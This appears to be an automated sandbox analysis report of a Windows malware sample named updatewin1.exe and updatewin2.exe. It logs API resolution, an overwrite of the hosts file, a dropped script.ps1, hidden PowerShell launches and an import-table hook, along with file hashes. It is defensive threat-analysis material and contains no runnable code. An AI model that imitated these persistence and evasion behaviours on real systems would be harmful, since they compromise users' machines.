Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Load api-ms-win-appmodel-runtime-l1-1-2 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe base_address = 0x400000 True 2
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-05-13 17:22:58 (UTC) True 2
Fn
Get Time type = Ticks, time = 157670 True 1
Fn
Get Time type = Performance Ctr, time = 21909222860 True 1
Fn
Get Time type = Ticks, time = 157795 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = Performance Ctr, time = 21947172015 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #7: updatewin2.exe
654 0
»
Information Value
ID #7
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:39, Reason: Child Process
Unmonitor End Time: 00:01:43, Reason: Self Terminated
Monitor Duration 00:00:03
OS Process Information
»
Information Value
PID 0x570
Parent PID 0x2c8 (c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 56C
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x005C5000 0x005C5FFF Marked Executable - 32-bit - False False
...
updatewin2.exe 0x00400000 0x0044CFFF Relevant Image - 32-bit - False False
...
updatewin2.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Windows\System32\drivers\etc\hosts 7.92 KB MD5: 360d265eddea8679c434a205f7ade7ad
SHA1: e17d843f610e0283904e201195360525ae449a68
SHA256: 5a1597c0d29dd475e33cd8889d7d848037a8c17bad0f3daa022fb889e0db7ead
SSDeep: 96:vDZEurK9q3WlSyU0FXmGZll0TOHyF9fAHLmttA/ZKTKdIlMHqzoCGbXx:RrK9FU0FXmGZll06m9fAH6AhKTK9Cax 		False
...
Host Behavior
File (9)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\System32\drivers\etc\hosts desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\System32\drivers\etc\hosts type = size True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write C:\Windows\System32\drivers\etc\hosts size = 7286 True 1
Fn
Data
Module (135)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Load api-ms-win-appmodel-runtime-l1-1-2 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe base_address = 0x400000 True 2
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x76c3196e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-05-13 17:22:59 (UTC) True 1
Fn
Get Time type = Ticks, time = 158793 True 1
Fn
Get Time type = Performance Ctr, time = 22020158348 True 1
Fn
Get Time type = Ticks, time = 159011 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = System Time, time = 2019-05-13 17:23:00 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 22164934135 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #8: updatewin1.exe
671 0
»
Information Value
ID #8
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe" --Admin
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\
Monitor Start Time: 00:01:39, Reason: Child Process
Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:03:04
OS Process Information
»
Information Value
PID 0x6d0
Parent PID 0x8f0 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 534
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x002D5000 0x002D5FFF Marked Executable - 32-bit - False False
...
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000002c0000:+0x1679d 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x00000000008e0000:+0x68f6f6
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 49 bytes MD5: f972c62f986b5ed49ad7713d93bf6c9f
SHA1: 4e157002bdb97e9526ab97bfafbf7c67e1d1efbf
SHA256: b47f85974a7ec2fd5aa82d52f08eb0f6cea7e596a98dd29e8b85b5c37beca0a8
SSDeep: 3:uIHeGAFcX5wTnl:/eGgHTl 		False
...
Host Behavior
File (8)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 size = 49 True 1
Fn
Data
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create powershell os_pid = 0x86c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Module (151)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load kernel32.dll - False 1
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
